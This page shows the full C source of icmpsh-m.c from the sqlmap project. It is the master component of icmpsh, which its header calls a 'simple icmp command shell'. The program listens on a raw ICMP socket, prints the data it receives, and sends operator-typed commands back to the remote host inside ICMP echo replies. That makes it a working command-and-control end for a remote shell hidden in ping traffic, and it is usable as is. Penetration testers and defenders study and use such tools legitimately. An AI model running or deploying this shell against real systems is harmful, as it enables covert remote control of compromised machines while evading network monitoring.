Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
 Path: blob/master/extra/icmpsh/icmpsh-m.c
2992 views
1
/*

2
 *   icmpsh - simple icmp command shell

3
 *   Copyright (c) 2010, Nico Leidecker <[email protected]>

4
 *   This program is free software: you can redistribute it and/or modify

5
 *   it under the terms of the GNU General Public License as published by

6
 *   the Free Software Foundation, either version 3 of the License, or

7
 *   (at your option) any later version.

8
 *

9
 *    This program is distributed in the hope that it will be useful,

10
 *    but WITHOUT ANY WARRANTY; without even the implied warranty of

11
 *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the

12
 *    GNU General Public License for more details.

13
 *

14
 *    You should have received a copy of the GNU General Public License

15
 *    along with this program.  If not, see <http://www.gnu.org/licenses/>.

16
 */

17


18
#include <stdio.h>

19
#include <stdlib.h>

20
#include <sys/types.h>

21
#include <sys/socket.h>

22
#include <sys/stat.h>

23
#include <netinet/in.h>

24
#include <netinet/ip_icmp.h>

25
#include <netinet/ip.h>

26
#include <string.h>

27
#include <unistd.h>

28
#include <fcntl.h>

29


30
#define IN_BUF_SIZE   1024

31
#define OUT_BUF_SIZE  64

32


33
// calculate checksum

34
unsigned short checksum(unsigned short *ptr, int nbytes)

35
{

36
    unsigned long sum;

37
    unsigned short oddbyte, rs;

38


39
    sum = 0;

40
    while(nbytes > 1) {

41
        sum += *ptr++;

42
        nbytes -= 2;

43
    }

44


45
    if(nbytes == 1) {

46
        oddbyte = 0;

47
        *((unsigned char *) &oddbyte) = *(u_char *)ptr;

48
        sum += oddbyte;

49
    }

50


51
    sum  = (sum >> 16) + (sum & 0xffff);

52
    sum += (sum >> 16);

53
    rs = ~sum;

54
    return rs;

55
}

56


57
int main(int argc, char **argv)

58
{

59
    int sockfd;

60
    int flags;

61
    char in_buf[IN_BUF_SIZE];

62
    char out_buf[OUT_BUF_SIZE];

63
    unsigned int out_size;

64
    int nbytes;

65
    struct iphdr *ip;

66
    struct icmphdr *icmp;

67
    char *data;

68
    struct sockaddr_in addr;

69


70


71
    printf("icmpsh - master\n");

72
    

73
    // create raw ICMP socket

74
    sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);

75
    if (sockfd == -1) {

76
       perror("socket");

77
       return -1;

78
    }

79


80
    // set stdin to non-blocking

81
    flags = fcntl(0, F_GETFL, 0);

82
    flags |= O_NONBLOCK;

83
    fcntl(0, F_SETFL, flags);

84


85
    printf("running...\n");

86
    while(1) {

87


88
        // read data from socket

89
        memset(in_buf, 0x00, IN_BUF_SIZE);

90
        nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1);

91
        if (nbytes > 0) {

92
            // get ip and icmp header and data part

93
            ip = (struct iphdr *) in_buf;

94
            if (nbytes > sizeof(struct iphdr)) {

95
                nbytes -= sizeof(struct iphdr);

96
                icmp = (struct icmphdr *) (ip + 1);

97
                if (nbytes > sizeof(struct icmphdr)) {

98
                    nbytes -= sizeof(struct icmphdr);

99
                    data = (char *) (icmp + 1);

100
                    data[nbytes] = '\0';

101
                    printf("%s", data);

102
                    fflush(stdout);

103
                }

104
                

105
                // reuse headers

106
                icmp->type = 0;

107
                addr.sin_family = AF_INET;

108
                addr.sin_addr.s_addr = ip->saddr;

109
        

110
                // read data from stdin

111
                nbytes = read(0, out_buf, OUT_BUF_SIZE);

112
                if (nbytes > -1) {

113
                    memcpy((char *) (icmp + 1), out_buf, nbytes);

114
                    out_size = nbytes;

115
                } else {

116
                    out_size = 0;

117
                }

118


119
                icmp->checksum = 0x00;

120
                icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size);

121


122
                // send reply

123
                nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr));

124
                if (nbytes == -1) {

125
                    perror("sendto");

126
                    return -1;

127
                }        

128
            }

129
        }

130
    }

131


132
    return 0;

133
}

134


135


136